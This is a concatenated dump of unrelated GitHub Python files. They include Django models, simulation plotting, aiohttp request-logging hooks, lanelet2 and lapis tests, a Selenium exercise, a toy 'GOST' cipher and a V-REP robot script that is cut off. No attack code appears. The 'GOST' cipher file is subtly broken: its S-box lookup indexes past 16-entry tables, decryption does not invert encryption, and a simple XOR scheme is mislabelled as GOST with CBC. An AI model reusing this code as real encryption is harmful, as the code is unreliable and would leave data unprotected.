choices=APPLICATION_STATUS_CHOICES, default='u'\n )\n\n def __str__(self):\n return \"<{} of {}, status: {}>\".format(self.__class__.__name__,\n self.profile,\n self.get_status_display())\n\n\nclass Membership(BaseModel):\n PAYMENT_METHOD_CHOICES = (\n ('on', 'Online'),\n ('off', 'Offline'),\n )\n\n profile = models.ForeignKey(\n 'UserProfile', related_name=\"membership_history\"\n )\n from_date = models.DateField()\n to_date = models.DateField()\n payment = models.ForeignKey('payments.Payment', blank=True, null=True)\n payment_method = models.CharField(\n 
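`joinmsg`/`postmsg` in the login record above build JSON by string concatenation, which breaks as soon as a username or entry contains a quote. `json.dumps` produces the same messages with correct escaping:

```python
import json, time

def joinmsg(username: str, pwd: str) -> str:
    return json.dumps({"join": {"username": username, "password": pwd}})

def postmsg(entry: str) -> str:
    return json.dumps({"post": {"entry": entry, "timestamp": str(time.time())}})

print(joinmsg('alice', 'p"w'))   # embedded quotes are escaped correctly
print(postmsg('hello world'))
```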
max_length=3, choices=PAYMENT_METHOD_CHOICES, default='on'\n )\n\n def __str__(self):\n return \"{user}, {frm} to {to}\".format(\n user=self.profile.user.username,\n frm=self.from_date,\n to=self.to_date\n )\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_profile(sender, **kwargs):\n if kwargs['created'] is True:\n try:\n UserProfile.objects.create(user_id=kwargs['instance'].id)\n except DatabaseError:\n pass\n","repo_name":"pythonindia/pssi.org.in","sub_path":"apps/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"30339782977","text":"import os, sys\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom scipy.stats import norm\nfrom siphon_utils import *\n\nSHOW = False\n\nDIR = os.path.dirname(os.path.join(os.getcwd(), os.path.dirname(sys.argv[0])))\nCHAIN_DIR = os.path.join(DIR, 'chain_siphon')\nALL = []\nRT = 'output'\nROOT = os.path.join(CHAIN_DIR, RT)\n\nCONF_INT = -1 # either the percent confidence interval, or negative number for # of stdev to show\nEXCLUDED = [\n # 'max',\n # 'control',\n # 'chain',\n # 'LJP',\n 'leader',\n]\n\nname_mapping = {'chain': 'Chain Siphon',\n 'control': 'Control',\n 'LJP': 'LJP',\n 'leader': 'Leader',\n 'max': 'Theoretical Max'}\n\nOUTPUT_DIR = os.path.join(ROOT, 'plots')\n\nVALUES = range(1, 31)\nROUND = 1\nCARE = -1 # use numbers in linear reg if >CARE\n\nfor (plotting, PROP) in (('failed', False), ('failed', True), ('successful', False), ('successful', True)):\n print(\"plotting \" + plotting + ' blimps, proportion is', PROP)\n legend_entries = 0\n labeled_bars = False\n\n if plotting == 'failed':\n plotting = 'failed'\n y_ax = 'stuck'\n else:\n plotting = 'successful'\n y_ax = 'successful'\n\n for folder in os.listdir(ROOT):\n if folder in EXCLUDED:\n continue\n folder_dir = os.path.join(ROOT, folder)\n\n data_dict, data = datadict_from_folder(folder_dir)\n if data_dict is None:\n continue\n\n keys = list(data_dict.keys())\n keys.sort()\n\n values = np.array([data_dict[entry][plotting] for entry in keys])\n if PROP:\n y = values/keys\n else:\n y = values\n var = np.array([data_dict[entry]['var'] for entry in keys])\n trials = np.array([data_dict[entry]['trials'] for entry in keys])\n stdev = np.sqrt(var)\n # VALUES=DATA['num_agents']\n\n label = folder\n if label in name_mapping:\n label = name_mapping[label]\n print(\"\\tplotting:\", label)\n\n plt.plot(keys, y, alpha=1, label=label)\n legend_entries += 1\n # leg.append(folder)\n\n bar_label = None\n if CONF_INT > 0:\n percentile = 1 - (1 - CONF_INT/100)/2\n # since double sided\n\n # 95% confidence interval, subtract 1 from num trials since 1 DOF lost for variance\n conf = (stdev/np.sqrt(trials - 1))*norm.ppf(percentile)\n if PROP:\n conf = conf/keys\n if not labeled_bars:\n labeled_bars = True\n bar_label = str(CONF_INT) + '% conf. 
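`is_pssi_member` in the Django record above reduces to an interval-containment test: does any membership row satisfy `from_date <= now <= to_date`? The same `from_date__lte`/`to_date__gte` filter in plain Python, with invented dates:

```python
from datetime import date

memberships = [(date(2022, 1, 1), date(2022, 12, 31)),
               (date(2024, 1, 1), date(2024, 12, 31))]

def is_member(on_day: date) -> bool:
    return any(frm <= on_day <= to for frm, to in memberships)

print(is_member(date(2024, 6, 1)))   # True
print(is_member(date(2023, 6, 1)))   # False
```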
int'\n low = np.max((y - conf, [0 for _ in range(len(y))]), axis=0)\n high = np.min((y + conf, [(1 if PROP else i) for i in range(1, 1 + len(y))]), axis=0)\n plt.fill_between(keys, low, high,\n alpha=.35,\n #color='gray', label=bar_label\n )\n if bar_label is not None:\n legend_entries += 1\n ALL.append(y)\n elif CONF_INT < 0:\n conf = stdev*np.abs(CONF_INT)\n if PROP:\n conf = conf/keys\n\n if not labeled_bars:\n labeled_bars = True\n bar_label = '$\\pm' + str(abs(CONF_INT)) + '$ stdev'\n\n low = np.max((y - conf, [0 for _ in range(len(y))]), axis=0)\n high = np.min((y + conf, [(1 if PROP else i) for i in range(1, 1 + len(y))]), axis=0)\n plt.fill_between(keys, low, high,\n alpha=.35,\n #color='gray', label=bar_label\n )\n if bar_label is not None:\n legend_entries += 1\n if False:\n XY = []\n for x, s in zip(keys, values):\n if s > CARE:\n XY.append([x, s])\n else:\n XY = []\n XY = np.array(XY)\n Y = XY[:, [1]]\n X = np.concatenate((np.ones((len(XY), 1)), XY[:, [0]]), axis=1)\n result = np.linalg.lstsq(X, Y, rcond=None)\n b = result[0][0][0]\n m = result[0][1][0]\n\n guess = np.array([[i*m + b] for i in VALUES])\n\n plt.plot(VALUES, guess.reshape(-1)/(np.array(VALUES) if PROP else 1), '--' if folder == \"CHAINS\" else ':',\n alpha=.5, color='purple',\n label=('y = {0}*x' + (' + ' if b > 0 else ' ') + '{1}').format(round(m, ROUND), round(b, ROUND)))\n legend_entries += 1\n if 'max' not in EXCLUDED:\n plt.plot(VALUES, [(1 if PROP else i) for i in VALUES], '--',\n alpha=.5,\n label=name_mapping['max'] if 'max' in name_mapping else 'max'\n )\n legend_entries += 1\n plt.xlabel('Number of agents')\n\n plt.ylabel(('Proportion of ' if PROP else '') + y_ax + ' blimps')\n plt.ylim((0, 1.1 if PROP else plt.ylim()[1]))\n plt.legend( # + leg_fill[0:1],\n # loc=('lower right' if PROP else 'upper left')\n # loc='center right', bbox_to_anchor=(1.2, .5),ncol=3,\n loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=int(np.ceil(legend_entries/2))\n )\n save_file = os.path.join(OUTPUT_DIR, ('prop_' if PROP else '') + y_ax + '_rate.png')\n if not os.path.exists(os.path.dirname(save_file)):\n os.makedirs(os.path.dirname(save_file))\n plt.savefig(save_file)\n if SHOW:\n plt.show()\n plt.close()\n\nfor folder in os.listdir(ROOT):\n if folder in EXCLUDED:\n continue\n folder_dir = os.path.join(ROOT, folder)\n\n data_dict, data = datadict_from_folder(folder_dir)\n if data_dict is None:\n continue\n \n keys = list(data_dict.keys())\n keys.sort()\n\n trials = np.array([data_dict[entry]['trials'] for entry in keys])\n \n label = folder\n if label in name_mapping:\n label = name_mapping[label]\n\n plt.plot(keys, trials, alpha=.5, label=label)\n\nplt.xlabel('Number of agents')\nplt.xlim(0,plt.xlim()[1])\nplt.ylim(0,plt.ylim()[1])\nplt.ylabel('Trials run')\n\nplt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=4)\nsave_file = os.path.join(OUTPUT_DIR, 'trials.png')\nif not os.path.exists(os.path.dirname(save_file)):\n os.makedirs(os.path.dirname(save_file))\nplt.savefig(save_file)\nplt.close()\n","repo_name":"pranavraj575/swarm_coppeliasim","sub_path":"chain_siphon/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33161332121","text":"import textwrap\nfrom asyncio import CancelledError\nfrom types import SimpleNamespace\n\nfrom aiohttp import (\n ClientSession,\n TraceRequestStartParams,\n TraceRequestChunkSentParams,\n TraceRequestEndParams,\n TraceConfig,\n 
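The confidence band in the plotting record above has half-width (stdev / √(trials − 1)) · z, where z is the two-sided normal quantile for the chosen level (one degree of freedom is subtracted for the estimated variance). A worked instance with invented sample statistics:

```python
import numpy as np
from scipy.stats import norm

conf_pct = 95
percentile = 1 - (1 - conf_pct / 100) / 2   # 0.975 for a two-sided 95% band
z = norm.ppf(percentile)                    # ~1.96

stdev, trials, mean = 0.12, 50, 0.8
half_width = (stdev / np.sqrt(trials - 1)) * z
print(f"{mean:.2f} +/- {half_width:.3f}")   # 0.80 +/- 0.034
```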
TraceRequestExceptionParams,\n)\n\nfrom zerooo.core.log import LOGGER, formatHeaders\nfrom zerooo.core.options import optDebug\n\ndebug = optDebug.__get__()\n\n\ndef is_printable_content_type(content_type):\n return 'text' in content_type or 'json' in content_type or 'xml' in content_type or 'html' in content_type\n\n\n# hook 请求包\nasync def on_request_start(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestStartParams) -> None:\n trace_config_ctx.method = params.method\n trace_config_ctx.url = params.url\n trace_config_ctx.headers = formatHeaders(params.headers)\n trace_config_ctx.chunk = None\n\n\n# hook post数据\nasync def on_request_chunk_sent(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestChunkSentParams) -> None:\n trace_config_ctx.chunk = params.chunk\n\n\nasync def on_request_end(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestEndParams) -> None:\n if is_printable_content_type(params.response.content_type):\n params.response._text = await params.response.text()\n else:\n params.response._text = params.response.content\n\n reshdrs = formatHeaders(params.response.headers)\n result = textwrap.dedent(f'''\n---------------- request ----------------\n{params.method} {params.url}\nHost: {params.url.host}:{params.url.port}\n{trace_config_ctx.headers}\n\n{str(trace_config_ctx.chunk, 'utf-8') if trace_config_ctx.chunk else ''}\n---------------- response ----------------\n{params.response.status} {params.response.reason}\nHost: {params.url.host}:{params.url.port}\n{reshdrs}\n\n{params.response._text}\n''')\n LOGGER.debug(result, debug, 'http')\n\n\nasync def on_request_exception(session: ClientSession, trace_config_ctx: SimpleNamespace,\n params: TraceRequestExceptionParams) -> None:\n if isinstance(params.exception, CancelledError):\n result = textwrap.dedent(f'''\n---------------- request ----------------\n{params.method} {params.url}\nHost: {params.url.host}:{params.url.port}\n{trace_config_ctx.headers}\n\n{str(trace_config_ctx.chunk, 'utf-8') if trace_config_ctx.chunk else ''}\n''')\n LOGGER.debug(result, debug, 'http')\n LOGGER.warning(\"Request cancelled\")\n else:\n result = textwrap.dedent(f'''\n---------------- request ----------------\n{params.method} {params.url}\nHost: {params.url.host}:{params.url.port}\n{trace_config_ctx.headers}\n\n{str(type(params.exception))}{str(params.exception)}\n''')\n LOGGER.exception(result)\n\n\ndef build_log_trace_config() -> TraceConfig:\n trace_config = TraceConfig()\n trace_config.on_request_start.append(on_request_start)\n trace_config.on_request_end.append(on_request_end)\n # trace_config.on_request_redirect.append(on_request_redirect)\n trace_config.on_request_chunk_sent.append(on_request_chunk_sent)\n trace_config.on_request_exception.append(on_request_exception)\n return trace_config\n","repo_name":"Amzza0x00/Zerooo-Exploitation-Framework","sub_path":"zerooo/request/hookrequest.py","file_name":"hookrequest.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"77"} +{"seq_id":"9472966096","text":"import unittest\nimport computation\nimport src.loader.src.loader as loader_module\nimport matplotlib.pyplot as plt\nimport lanelet2\nimport os\nimport igraph\n\n\ndef create_roadgraph_graph(lanelet_map):\n \"\"\"Creates the igraph graph for the roadgraph.\n\n Args:\n lanelet_map (lanelet2.core.LaneletMap): The lanelet map created by lanelet2\n\n Returns:\n igraph.Graph: the 
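# --- Added usage sketch (not in the original record): attaching the
# TraceConfig built by build_log_trace_config() above to a client session;
# the URL is a placeholder.
import asyncio
import aiohttp

async def fetch_with_tracing():
    trace_config = build_log_trace_config()
    async with aiohttp.ClientSession(trace_configs=[trace_config]) as session:
        async with session.get("https://example.com") as resp:
            return resp.status

# asyncio.run(fetch_with_tracing())
# --- end added sketch ---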
roadgraph in the igraph format\n \"\"\"\n traffic_rules = lanelet2.traffic_rules.create(\n lanelet2.traffic_rules.Locations.Germany, lanelet2.traffic_rules.Participants.Vehicle\n )\n routing_graph = lanelet2.routing.RoutingGraph(lanelet_map, traffic_rules)\n # TODO: Maybe implement stronger hashing function than SHA1 (SHA256?) or maybe encryption?\n # Name collisions should be avoided here as this could later be parallelized.\n file_path = f\"./{hash(lanelet_map)}transformed_graph.graphml\"\n routing_graph.exportGraphML(file_path)\n graph = igraph.Graph().Read_GraphML(file_path)\n os.remove(file_path)\n return graph\n\n\nclass TestTaf(unittest.TestCase):\n \"\"\"Test case for the taf dataset\"\"\"\n\n def setUp(self):\n osm_path = \"./src/computation/test/data/K733/K733_fix.osm\"\n origin = (\n 49.005306,\n 8.4374089,\n )\n\n csv_path = \"./src/loader/test/data/taf/vehicle_tracks_000.csv\"\n loader = loader_module.Loader()\n loader.load_dataset(csv_path)\n scenario = loader.return_scenario(csv_path)\n timestamp = 153300\n scene = scenario.get_scene(timestamp)\n\n lanelet_map = computation.read_to_lanelet_map(osm_path, origin)\n\n matching_dict = computation.ProbabilisticMatchingDict(scene, lanelet_map)\n roadgraph = computation.Roadgraph(\n lanelet_map, matching_dict, create_roadgraph_graph(lanelet_map)\n )\n projection_identity_dict = computation.ProjectionIdentityDict(matching_dict)\n\n self.semantic_scene_graph = computation.SemanticSceneGraph(\n matching_dict, scene, roadgraph, projection_identity_dict, verbose=True\n )\n\n def test_create_dot_file(self):\n self.semantic_scene_graph.write_dot(\"./semantic_scene_graph.dot\")\n\n\nclass TestShowData(unittest.TestCase):\n \"\"\"Not really a test. Visualizes data from computation\"\"\"\n\n def setUp(self):\n # using TAF dataset\n osm_path = \"./src/computation/test/data/K733/K733_fix.osm\"\n origin = (\n 49.005306,\n 8.4374089,\n )\n csv_path = \"./src/loader/test/data/taf/vehicle_tracks_000.csv\"\n loader = loader_module.Loader()\n loader.load_dataset(csv_path)\n lanelet_map = computation.read_to_lanelet_map(osm_path, origin)\n self.timestamp = 153300\n self.scenario = loader.return_scenario(csv_path)\n self.entity_id_list = self.scenario.entity_ids\n self.lanelet_list = []\n for lanelet in lanelet_map.laneletLayer:\n self.lanelet_list.append(lanelet)\n\n def test_print_lanelets(self):\n \"\"\"Function to print out a list of lanelets from the lanelet_map\n\n Args:\n lanelet_list (list): list of lanelets to be printed\n \"\"\"\n for lanelet in self.lanelet_list:\n print(lanelet)\n\n def test_plot_lanelets(self):\n \"\"\"Function, which plots a map of the street section\"\"\"\n # plot lanelets\n for lanelet in self.lanelet_list:\n for i in range(len(lanelet.leftBound)):\n plt.plot(lanelet.leftBound[i].x, lanelet.leftBound[i].y, \"b.-\")\n for j in range(len(lanelet.rightBound)):\n plt.plot(lanelet.rightBound[j].x, lanelet.rightBound[j].y, \"r.-\")\n\n # plot entities for a certain timestamp\n for entity_id in self.entity_id_list:\n current_entity = self.scenario.get_entity(entity_id)\n current_entity_state = current_entity.get_entity_state(self.timestamp)\n if current_entity_state is not None:\n plt.plot(current_entity_state.x, current_entity_state.y, \"g.-\")\n\n plt.axis(\"equal\")\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == \"__main__\":\n 
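# --- Added note (sketch): the TODO above mentions stronger hashing, and
# hash(lanelet_map) is Python's id-based object hash, so it changes between
# runs and says nothing about map content. A throwaway unique filename
# sidesteps collisions entirely:
import os
import tempfile
import uuid

file_path = os.path.join(tempfile.gettempdir(), f"{uuid.uuid4().hex}_transformed_graph.graphml")
# --- end added note ---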
unittest.main()\n","repo_name":"Mercyrion/semantic_scene_graph","sub_path":"src/computation/testcomputation.py","file_name":"testcomputation.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41126755682","text":"import ast\nimport pytest\nfrom time import time as pytime\n\nfrom cobald.monitor.format_line import LineProtocolFormatter\nfrom usim import Scope, time\n\nfrom lapis_tests import via_usim\n\nfrom . import make_test_logger\n\nfrom lapis.monitor.general import resource_statistics\nfrom lapis.monitor import SimulationTimeFilter, Monitoring\n\n\ndef parse_line_protocol(literal: str):\n name_tags, _, fields_stamp = literal.strip().partition(\" \")\n fields, _, stamp = fields_stamp.partition(\" \")\n fields = fields.split(\",\") if fields else []\n name, *tags = name_tags.split(\",\")\n return (\n name,\n {key: value for key, value in (tag.split(\"=\") for tag in tags)},\n {\n key: ast.literal_eval(value)\n for key, value in (field.split(\"=\") for field in fields)\n },\n None if not stamp else int(stamp),\n )\n\n\nclass TestSimulationTimeFilter(object):\n @via_usim\n async def test_simple(self):\n payload = {\"a\": \"a\"}\n logger, handler = make_test_logger(__name__)\n handler.formatter = LineProtocolFormatter(resolution=1)\n logger.addFilter(SimulationTimeFilter())\n logger.critical(\"message\", payload)\n _, _, _, timestamp = parse_line_protocol(handler.content)\n handler.clear()\n assert timestamp == 0\n await (time + 10)\n logger.critical(\"message\", payload)\n _, _, _, timestamp = parse_line_protocol(handler.content)\n assert timestamp == 10000000000\n\n @via_usim\n async def test_explicit(self):\n def record():\n pass\n\n record.created = pytime()\n filter = SimulationTimeFilter()\n async with Scope() as _:\n filter.filter(record)\n assert record.created == 0\n\n\ndef dummy_statistics():\n return []\n\n\nclass TestMonitoring(object):\n def test_registration(self):\n monitoring = Monitoring()\n statistics = resource_statistics\n monitoring.register_statistic(statistics)\n for element in statistics.whitelist:\n assert statistics in monitoring._statistics.get(element)\n\n def test_registration_failure(self):\n monitoring = Monitoring()\n statistics = dummy_statistics\n with pytest.raises(AssertionError):\n monitoring.register_statistic(statistics)\n assert all(statistics not in stat for stat in monitoring._statistics.values())\n # define required attributes except whitelist\n statistics.name = \"test\"\n statistics.logging_formatter = {}\n monitoring.register_statistic(statistics)\n assert all(statistics not in stat for stat in monitoring._statistics.values())\n statistics.whitelist = (str,)\n monitoring.register_statistic(statistics)\n assert all(statistics in stat for stat in monitoring._statistics.values())\n","repo_name":"MatterMiners/lapis","sub_path":"lapis_tests/utility/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"5953270675","text":"import time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\ndriver = 
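# --- Added example (illustrative input only): parse_line_protocol above
# splits an InfluxDB line-protocol record into measurement, tags, fields
# and timestamp.
name, tags, fields, stamp = parse_line_protocol('cpu,host=a usage=0.5 1440000000000')
assert name == 'cpu' and tags == {'host': 'a'}
assert fields == {'usage': 0.5} and stamp == 1440000000000
# --- end added example ---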
webdriver.Chrome(executable_path='C:/chromedriver.exe')\ndriver.maximize_window()\ndriver.get(\"http://demo.automationtesting.in/WebTable.html\")\ndriver.implicitly_wait(5)\nSwitch = driver.find_element_by_link_text('SwitchTo')\nSwitch.click()\nwin = driver.find_element_by_css_selector('[href=\"Windows.html\"]')\nwin.click()\ntime.sleep(2)\n\nnew_win = driver.find_element_by_css_selector('[href=\"http://www.selenium.dev\"]')\nnew_win.click()\n\nwindow_1 = driver.window_handles[1]\ndriver.switch_to.window(window_1)\ntime.sleep(5)\ndriver.close()\n\nwindow_0 = driver.window_handles[0]\ndriver.switch_to.window(window_0)\n\nsepar = driver.find_element_by_css_selector('[href=\"#Multiple\"]')\nsepar.click()\ns_win = driver.find_element_by_css_selector('[onclick=\"multiwindow()\"]')\ns_win.click()\nwindow_2 = driver.window_handles[2]\ndriver.switch_to.window(window_2)\n\nw_2 = WebDriverWait(driver, 10).until(\n EC.url_to_be('https://demo.automationtesting.in/Index.html'))\nnumber_of_tabs = WebDriverWait(driver, 10).until(\n EC.number_of_windows_to_be(3))\nprint(number_of_tabs)\n\nmail = driver.find_element_by_id('email')\nmail.send_keys(\"565@email.com\")\nenter = driver.find_element_by_id('enterimg')\nenter.click()\nura = WebDriverWait(driver, 10).until(\n EC.url_to_be('https://demo.automationtesting.in/Register.html'))\nprint(\"Krasavello!\")\ntime.sleep(3)\ndriver.quit()\n\n\n#C:/Users/kunae_000/PycharmProjects/pythonProject/Lesson3","repo_name":"greyav7/work_3","sub_path":"Lesson 3.8.5.py","file_name":"Lesson 3.8.5.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14751270640","text":"from collections import Counter\n\ndef solution(participant, completion):\n participant.sort()\n completion.sort()\n\n print(Counter(participant))\n print(Counter(completion))\n\n for i in range(0, len(completion)):\n if participant[i] != completion[i]:\n return participant[i]\n\n return participant[len(completion)]\n\nsolution([\"leo\", \"kiki\", \"eden\"], [\"eden\", \"kiki\"]\t)","repo_name":"dolgogae/algorithm","sub_path":"programmers/python/완주하지못한선수.py","file_name":"완주하지못한선수.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21951981004","text":"__author__ = \"Mikael Mortensen \"\n__date__ = \"2014-01-08\"\n__copyright__ = \"Copyright (C) 2014 \" + __author__\n__license__ = \"GNU Lesser GPL version 3 or any later version\"\n\nimport cppimport\n\ncompiled_module = cppimport.imp('fenicstools.fem.common')\n\ndef getMemoryUsage(rss=True):\n return compiled_module.getMemoryUsage(rss)\n\ndef SetMatrixValue(A, val):\n compiled_module.SetMatrixValue(A, val)\n\n","repo_name":"mikaem/fenicstools","sub_path":"fenicstools/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"77"} +{"seq_id":"38631091972","text":"import binascii\n\n\nS_BOXES = [\n (4, 10, 9, 2, 13, 8, 0, 14, 6, 11, 1, 12, 7, 15, 5, 3),\n (14, 11, 4, 12, 6, 13, 15, 10, 2, 3, 8, 1, 0, 7, 5, 9),\n (5, 8, 1, 13, 10, 3, 4, 2, 14, 15, 12, 7, 6, 0, 9, 11),\n (7, 13, 10, 1, 0, 8, 9, 15, 14, 4, 6, 12, 11, 2, 5, 3),\n (6, 12, 7, 1, 5, 15, 13, 8, 4, 10, 9, 14, 0, 3, 11, 2),\n (4, 11, 10, 0, 7, 2, 1, 13, 3, 6, 8, 5, 9, 12, 15, 14),\n (13, 11, 4, 1, 3, 15, 5, 9, 0, 10, 14, 7, 6, 8, 2, 12),\n (1, 15, 13, 0, 5, 7, 10, 4, 9, 2, 3, 14, 6, 11, 8, 
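# --- Added alternative sketch (not the author's approach): the marathon
# solution above imports Counter but only prints it; multiset subtraction
# finds the single non-finisher directly.
from collections import Counter

def solution_counter(participant, completion):
    # exactly one participant has no matching completion entry
    return next(iter(Counter(participant) - Counter(completion)))

assert solution_counter(["leo", "kiki", "eden"], ["eden", "kiki"]) == "leo"
# --- end added sketch ---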
12)\n]\n\n\ndef gost_encrypt(key, data):\n # Convert the key to a byte array\n key_bytes = bytearray.fromhex(key)\n\n # Convert the data to a byte array\n data_bytes = bytearray(data.encode())\n\n # Feedback with cipher-block chaining (CBC)\n iv = bytearray(8) # Initialization vector\n encrypted_data = bytearray()\n\n for i in range(len(data_bytes)):\n # Encrypt the current data byte\n encrypted_byte = data_bytes[i] ^ iv[i % 8] ^ key_bytes[i % len(key_bytes)]\n encrypted_byte = s_box_transform(encrypted_byte, i % 8)\n encrypted_data.append(encrypted_byte)\n\n # Update the initialization vector\n iv[i % 8] = encrypted_byte\n\n # Return the encrypted data as a byte array\n return encrypted_data\n\n\ndef gost_decrypt(key, data):\n # Convert the key to a byte array\n key_bytes = bytearray.fromhex(key)\n\n # Feedback with cipher-block chaining (CBC)\n iv = bytearray(8) # Initialization vector\n decrypted_data = bytearray()\n\n for i in range(len(data)):\n # Decrypt the current data byte\n decrypted_byte = s_box_transform(data[i], i % 8)\n decrypted_byte = decrypted_byte ^ iv[i % 8] ^ key_bytes[i % len(key_bytes)]\n decrypted_data.append(decrypted_byte)\n\n # Update the initialization vector\n iv[i % 8] = data[i]\n\n # Return the decrypted data as a string\n return decrypted_data.decode()\n\n\ndef s_box_transform(byte, index):\n # Get the corresponding S-box\n s_box = S_BOXES[index]\n\n # Calculate the S-box indices\n row = (byte >> 4) & 0x0F\n col = byte & 0x0F\n\n # Get the value from the S-box\n return s_box[row * 16 + col]\n\n\ndef save_bytes_to_file(filename, data):\n with open(filename, \"wb\") as f:\n f.write(data)\n\n\ndef save_string_to_file(filename, data):\n with open(filename, \"w\") as f:\n f.write(data)\n\n\ndef read_bytes_from_file(filename):\n with open(filename, \"rb\") as f:\n return f.read()\n\n\ndef read_string_from_file(filename):\n with open(filename, \"r\") as f:\n return f.read()\n\n\ndef print_hex_and_text(data, label):\n hex_data = binascii.hexlify(data).decode()\n text_data = data.decode()\n print(f\"{label} (Hex): {hex_data}\")\n print(f\"{label} (Text): {text_data}\")\n\n\ndef main():\n key_file = \"key.txt\"\n data_file = \"data.txt\"\n encrypted_file = \"encrypted.txt\"\n decrypted_file = \"decrypted.txt\"\n\n # Чтение ключа из файла\n key = read_string_from_file(key_file)\n\n # Чтение данных из файла\n data = read_string_from_file(data_file)\n\n # Вывод исходных данных\n print(\"Original Key and Data:\")\n print_hex_and_text(key.encode(), \"Key\")\n print_hex_and_text(data.encode(), \"Data\")\n print()\n\n # Шифрование данных\n encrypted_data = gost_encrypt(key, data)\n\n # Вывод зашифрованных данных\n print(\"Encrypted Data:\")\n print_hex_and_text(encrypted_data, \"Encrypted Data\")\n print()\n\n # Сохранение зашифрованных данных в файл\n save_bytes_to_file(encrypted_file, encrypted_data)\n\n # Загрузка зашифрованных данных из файла\n encrypted_data = read_bytes_from_file(encrypted_file)\n\n # Дешифрование данных\n decrypted_data = gost_decrypt(key, encrypted_data)\n\n # Вывод расшифрованных данных\n print(\"Decrypted Data:\")\n print_hex_and_text(decrypted_data.encode(), \"Decrypted Data\")\n print()\n\n # Сохранение расшифрованных данных в файл\n save_string_to_file(decrypted_file, decrypted_data)\n\n # Вывод успешного завершения операции\n print(\"Encryption and decryption completed successfully.\")\n\n # Изменение ключа\n new_key = input(\"Enter a new key: \")\n key = new_key.strip()\n\n # Изменение данных\n new_data = input(\"Enter new data: \")\n data = 
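# --- Added note + sketch (assumption: conventional 4-bit S-box usage):
# each S-box above holds only 16 entries, yet s_box_transform computes
# row * 16 + col, which runs past the table whenever row > 0. GOST-style
# S-boxes substitute one 4-bit nibble at a time, for example:
def substitute_nibbles(byte, high_box, low_box):
    high = (byte >> 4) & 0x0F
    low = byte & 0x0F
    return (high_box[high] << 4) | low_box[low]
# --- end added note ---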
new_data.strip()\n\n # Вывод обновленных данных\n print(\"Updated Key and Data:\")\n print_hex_and_text(key.encode(), \"Key\")\n print_hex_and_text(data.encode(), \"Data\")\n print()\n\n # Шифрование обновленных данных\n encrypted_data = gost_encrypt(key, data)\n\n # Вывод зашифрованных данных\n print(\"Updated Encrypted Data:\")\n print_hex_and_text(encrypted_data, \"Encrypted Data\")\n print()\n\n # Сохранение обновленных зашифрованных данных в файл\n save_bytes_to_file(encrypted_file, encrypted_data)\n\n # Загрузка обновленных зашифрованных данных из файла\n encrypted_data = read_bytes_from_file(encrypted_file)\n\n # Дешифрование обновленных данных\n decrypted_data = gost_decrypt(key, encrypted_data)\n\n # Вывод расшифрованных обновленных данных\n print(\"Updated Decrypted Data:\")\n print_hex_and_text(decrypted_data.encode(), \"Decrypted Data\")\n print()\n\n # Сохранение расшифрованных обновленных данных в файл\n save_string_to_file(decrypted_file, decrypted_data)\n\n # Вывод успешного завершения операции\n print(\"Encryption and decryption of updated data completed successfully.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"machinegunnestea/7semestr","sub_path":"MZI/pythonProject1/2222.py","file_name":"2222.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19000717445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport vrep\nimport sys\nimport numpy as np\nvrep.simxFinish(-1)\nclientID=vrep.simxStart('127.0.0.1',19999,True,True,5000,5)\nif clientID!=-1:\n print ('Connected to remote API server')\nelse:\n print('Connection unsuccessful')\n sys.exit('Could not Connect')\nerrorcode,left_motor_handle = vrep.simxGetObjectHandle(clientID,'Pioneer_p3dx_leftMotor',vrep.simx_opmode_oneshot_wait)\nerrorcode,right_motor_handle = vrep.simxGetObjectHandle(clientID,'Pioneer_p3dx_rightMotor',vrep.simx_opmode_oneshot_wait)\nerrorcode = vrep.simxSetJointTargetVelocity(clientID,left_motor_handle,0.2,vrep.simx_opmode_streaming)\nerrorcode = vrep.simxSetJointTargetVelocity(clientID,right_motor_handle,0.2,vrep.simx_opmode_streaming)\nerrorcode,cam_Handle = vrep.simxGetObjectHandle(clientID,'Vision_sensor',vrep.simx_opmode_oneshot_wait)\nprint(cam_Handle)\nreturnCode,resolution,image=vrep.simxGetVisionSensorImage(clientID,cam_Handle,0,vrep.simx_opmode_streaming)\nreturnCode,resolution,image=vrep.simxGetVisionSensorImage(clientID,cam_Handle,0,vrep.simx_opmode_buffer)\nprint(image)\n\nsensor_h=[] #empty list for handles\nsensor_val=np.array([]) #empty array for sensor measurements\nfor x in range(1,16+1):\n 